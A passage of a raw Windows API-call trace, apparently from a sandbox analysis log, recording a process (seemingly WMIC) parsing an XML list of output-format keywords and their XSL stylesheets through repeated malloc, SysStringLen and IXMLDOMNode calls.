varVal2=0x4)) returned 0x0 [0249.554] malloc (_Size=0x18) returned 0x35c5e0 [0249.554] malloc (_Size=0x18) returned 0x35c600 [0249.554] SysStringLen (param_1="LIST") returned 0x4 [0249.554] SysStringLen (param_1="TABLE") returned 0x5 [0249.555] malloc (_Size=0x30) returned 0x358100 [0249.555] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.555] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.555] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.555] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=3, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.555] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="rawxml.xsl") returned 0x0 [0249.555] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.555] malloc (_Size=0x18) returned 0x35c620 [0249.555] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.555] free (_Block=0x35c620) [0249.555] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0249.555] malloc (_Size=0x18) returned 0x35c620 [0249.556] malloc (_Size=0x18) returned 0x35c640 [0249.556] SysStringLen (param_1="RAWXML") returned 0x6 [0249.556] SysStringLen (param_1="TABLE") returned 0x5 [0249.556] SysStringLen (param_1="RAWXML") returned 0x6 [0249.556] SysStringLen (param_1="LIST") returned 0x4 [0249.556] SysStringLen (param_1="LIST") returned 0x4 [0249.556] SysStringLen (param_1="RAWXML") returned 0x6 [0249.556] malloc (_Size=0x30) returned 0x358140 [0249.556] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.556] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.556] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.556] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=4, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.556] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="htable.xsl") returned 0x0 [0249.556] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.556] malloc (_Size=0x18) returned 0x35c660 [0249.556] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.557] free (_Block=0x35c660) [0249.557] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0249.557] malloc (_Size=0x18) returned 0x35c660 [0249.557] malloc (_Size=0x18) returned 0x35c680 [0249.557] SysStringLen (param_1="HTABLE") returned 0x6 [0249.557] SysStringLen (param_1="TABLE") returned 0x5 [0249.557] SysStringLen (param_1="HTABLE") returned 0x6 [0249.557] SysStringLen (param_1="LIST") returned 0x4 [0249.557] malloc (_Size=0x30) returned 0x358180 [0249.557] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.557] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.557] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.557] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=5, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.557] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="hform.xsl") returned 0x0 [0249.557] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.557] malloc (_Size=0x18) returned 0x35c6a0 [0249.557] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.558] free (_Block=0x35c6a0) [0249.558] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0249.558] malloc (_Size=0x18) returned 0x35c6a0 [0249.558] malloc (_Size=0x18) returned 0x35c6c0 [0249.558] SysStringLen (param_1="HFORM") returned 0x5 [0249.558] SysStringLen (param_1="TABLE") returned 0x5 [0249.558] SysStringLen (param_1="HFORM") returned 0x5 [0249.558] SysStringLen (param_1="LIST") returned 0x4 [0249.558] SysStringLen (param_1="HFORM") returned 0x5 [0249.558] SysStringLen (param_1="HTABLE") returned 0x6 [0249.558] malloc (_Size=0x30) returned 0x3581c0 [0249.558] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.558] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.558] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.558] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=6, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.558] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="xml.xsl") returned 0x0 [0249.558] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.559] malloc (_Size=0x18) returned 0x35c6e0 [0249.559] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.559] free (_Block=0x35c6e0) [0249.559] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0249.559] malloc (_Size=0x18) returned 0x35c6e0 [0249.559] malloc (_Size=0x18) returned 0x35c700 [0249.559] SysStringLen (param_1="XML") returned 0x3 [0249.559] SysStringLen (param_1="TABLE") returned 0x5 [0249.559] SysStringLen (param_1="XML") returned 0x3 [0249.559] SysStringLen (param_1="VALUE") returned 0x5 [0249.559] SysStringLen (param_1="VALUE") returned 0x5 [0249.559] SysStringLen (param_1="XML") returned 0x3 [0249.559] malloc (_Size=0x30) returned 0x358200 [0249.559] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.559] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.559] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.559] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=7, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.560] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="mof.xsl") returned 0x0 [0249.560] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.560] malloc (_Size=0x18) returned 0x35c720 [0249.560] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.560] free (_Block=0x35c720) [0249.560] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0249.560] malloc (_Size=0x18) returned 0x35c720 [0249.560] malloc (_Size=0x18) returned 0x35c740 [0249.560] SysStringLen (param_1="MOF") returned 0x3 [0249.560] SysStringLen (param_1="TABLE") returned 0x5 [0249.560] SysStringLen (param_1="MOF") returned 0x3 [0249.560] SysStringLen (param_1="LIST") returned 0x4 [0249.560] SysStringLen (param_1="MOF") returned 0x3 [0249.560] SysStringLen (param_1="RAWXML") returned 0x6 [0249.560] SysStringLen (param_1="LIST") returned 0x4 [0249.560] SysStringLen (param_1="MOF") returned 0x3 [0249.560] malloc (_Size=0x30) returned 0x358240 [0249.560] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.561] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.561] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.561] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=8, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.561] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="csv.xsl") returned 0x0 [0249.561] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.561] malloc (_Size=0x18) returned 0x35c760 [0249.561] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.561] free (_Block=0x35c760) [0249.561] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0249.561] malloc (_Size=0x18) returned 0x35c760 [0249.561] malloc (_Size=0x18) returned 0x35c780 [0249.561] SysStringLen (param_1="CSV") returned 0x3 [0249.561] SysStringLen (param_1="TABLE") returned 0x5 [0249.561] SysStringLen (param_1="CSV") returned 0x3 [0249.561] SysStringLen (param_1="LIST") returned 0x4 [0249.562] SysStringLen (param_1="CSV") returned 0x3 [0249.562] SysStringLen (param_1="HTABLE") returned 0x6 [0249.562] SysStringLen (param_1="CSV") returned 0x3 [0249.562] SysStringLen (param_1="HFORM") returned 0x5 [0249.562] malloc (_Size=0x30) returned 0x358280 [0249.562] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.562] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.562] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.562] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=9, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.562] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.562] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.562] malloc (_Size=0x18) returned 0x35c7a0 [0249.562] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.563] free (_Block=0x35c7a0) [0249.563] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0249.563] malloc (_Size=0x18) returned 0x35c7a0 [0249.563] malloc (_Size=0x18) returned 0x35c7c0 [0249.563] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.563] SysStringLen (param_1="TABLE") returned 0x5 [0249.563] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.563] SysStringLen (param_1="VALUE") returned 0x5 [0249.563] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.563] SysStringLen (param_1="XML") returned 0x3 [0249.563] SysStringLen (param_1="XML") returned 0x3 [0249.563] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.563] malloc (_Size=0x30) returned 0x3582c0 [0249.563] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.563] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.563] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.563] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=10, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.563] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.563] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.564] malloc (_Size=0x18) returned 0x35c7e0 [0249.564] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.564] free (_Block=0x35c7e0) [0249.564] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0249.564] malloc (_Size=0x18) returned 0x35c7e0 [0249.564] malloc (_Size=0x18) returned 0x35c800 [0249.564] SysStringLen (param_1="texttablewsys") returned 0xd [0249.564] SysStringLen (param_1="TABLE") returned 0x5 [0249.564] SysStringLen (param_1="texttablewsys") returned 0xd [0249.564] SysStringLen (param_1="XML") returned 0x3 [0249.564] SysStringLen (param_1="texttablewsys") returned 0xd [0249.564] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.564] SysStringLen (param_1="XML") returned 0x3 [0249.564] SysStringLen (param_1="texttablewsys") returned 0xd [0249.564] malloc (_Size=0x30) returned 0x358300 [0249.565] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.565] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.565] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.565] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=11, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.565] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.565] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.565] malloc (_Size=0x18) returned 0x35c820 [0249.565] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.565] free (_Block=0x35c820) [0249.565] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0249.565] malloc (_Size=0x18) returned 0x35c820 [0249.565] malloc (_Size=0x18) returned 0x35c840 [0249.565] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.565] SysStringLen (param_1="TABLE") returned 0x5 [0249.565] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.565] SysStringLen (param_1="XML") returned 0x3 [0249.566] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.566] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.566] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.566] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.566] malloc (_Size=0x30) returned 0x358340 [0249.566] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.566] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.566] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.566] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=12, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.566] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.566] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.566] malloc (_Size=0x18) returned 0x35c860 [0249.566] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.566] free (_Block=0x35c860) [0249.566] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0249.566] malloc (_Size=0x18) returned 0x35c860 [0249.566] malloc (_Size=0x18) returned 0x35c880 [0249.567] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.567] SysStringLen (param_1="TABLE") returned 0x5 [0249.567] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.567] SysStringLen (param_1="XML") returned 0x3 [0249.567] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.567] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.567] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.567] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.567] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.567] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.567] malloc (_Size=0x30) returned 0x358380 [0249.567] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.567] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.567] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.567] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=13, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.567] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.567] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.567] malloc (_Size=0x18) returned 0x35c8a0 [0249.567] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.568] free (_Block=0x35c8a0) [0249.568] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0249.568] malloc (_Size=0x18) returned 0x35c8a0 [0249.568] malloc (_Size=0x18) returned 0x35c8c0 [0249.568] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.568] SysStringLen (param_1="TABLE") returned 0x5 [0249.568] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.568] SysStringLen (param_1="XML") returned 0x3 [0249.568] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.568] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.568] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.568] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.568] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.568] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.568] malloc (_Size=0x30) returned 0x3583c0 [0249.568] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.568] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.568] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.568] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=14, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.569] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.569] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.569] malloc (_Size=0x18) returned 0x35c8e0 [0249.569] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.569] free (_Block=0x35c8e0) [0249.569] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0249.569] malloc (_Size=0x18) returned 0x35c8e0 [0249.569] malloc (_Size=0x18) returned 0x35c900 [0249.569] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.569] SysStringLen (param_1="TABLE") returned 0x5 [0249.569] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.569] SysStringLen (param_1="XML") returned 0x3 [0249.569] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.569] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.569] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.569] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.569] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0249.570] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.570] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0249.570] malloc (_Size=0x30) returned 0x358400 [0249.570] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.570] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.570] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.570] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=15, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.570] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="htable.xsl") returned 0x0 [0249.570] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.570] malloc (_Size=0x18) returned 0x35c920 [0249.570] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.570] free (_Block=0x35c920) [0249.570] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0249.570] malloc (_Size=0x18) returned 0x35c920 [0249.571] malloc (_Size=0x18) returned 0x35c940 [0249.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.571] SysStringLen (param_1="TABLE") returned 0x5 [0249.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.571] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.571] SysStringLen (param_1="XML") returned 0x3 [0249.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.571] SysStringLen (param_1="texttablewsys") returned 0xd [0249.571] SysStringLen (param_1="XML") returned 0x3 [0249.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.571] malloc (_Size=0x30) returned 0x358440 [0249.571] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.571] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.571] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.571] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=16, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.571] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="htable.xsl") returned 0x0 [0249.571] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.571] malloc (_Size=0x18) returned 0x35c960 [0249.572] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.572] free (_Block=0x35c960) [0249.572] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0249.573] malloc (_Size=0x18) returned 0x35c960 [0249.573] malloc (_Size=0x18) returned 0x35c980 [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] SysStringLen (param_1="TABLE") returned 0x5 [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] SysStringLen (param_1="XML") returned 0x3 [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] SysStringLen (param_1="texttablewsys") returned 0xd [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0249.573] SysStringLen (param_1="XML") returned 0x3 [0249.573] SysStringLen (param_1="htable-sortby") returned 0xd [0249.573] malloc (_Size=0x30) returned 0x358480 [0249.573] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.573] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.573] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.573] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=17, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.573] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="mof.xsl") returned 0x0 [0249.574] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.574] malloc (_Size=0x18) returned 0x35c9a0 [0249.574] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.574] free (_Block=0x35c9a0) [0249.574] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0249.574] malloc (_Size=0x18) returned 0x35c9a0 [0249.574] malloc (_Size=0x18) returned 0x35c9c0 [0249.574] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0249.574] SysStringLen (param_1="TABLE") returned 0x5 [0249.574] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0249.574] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.574] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0249.574] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.574] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0249.574] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.574] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.574] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0249.574] malloc (_Size=0x30) returned 0x3584c0 [0249.574] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.575] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.575] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.575] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=18, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.575] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="mof.xsl") returned 0x0 [0249.575] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.575] malloc (_Size=0x18) returned 0x35c9e0 [0249.575] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.575] free (_Block=0x35c9e0) [0249.575] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0249.575] malloc (_Size=0x18) returned 0x35c9e0 [0249.575] malloc (_Size=0x18) returned 0x35ca00 [0249.575] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.575] SysStringLen (param_1="TABLE") returned 0x5 [0249.575] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.575] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0249.575] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.575] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0249.575] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.575] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0249.576] SysStringLen (param_1="wmiclimofformat") returned 0xf [0249.576] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 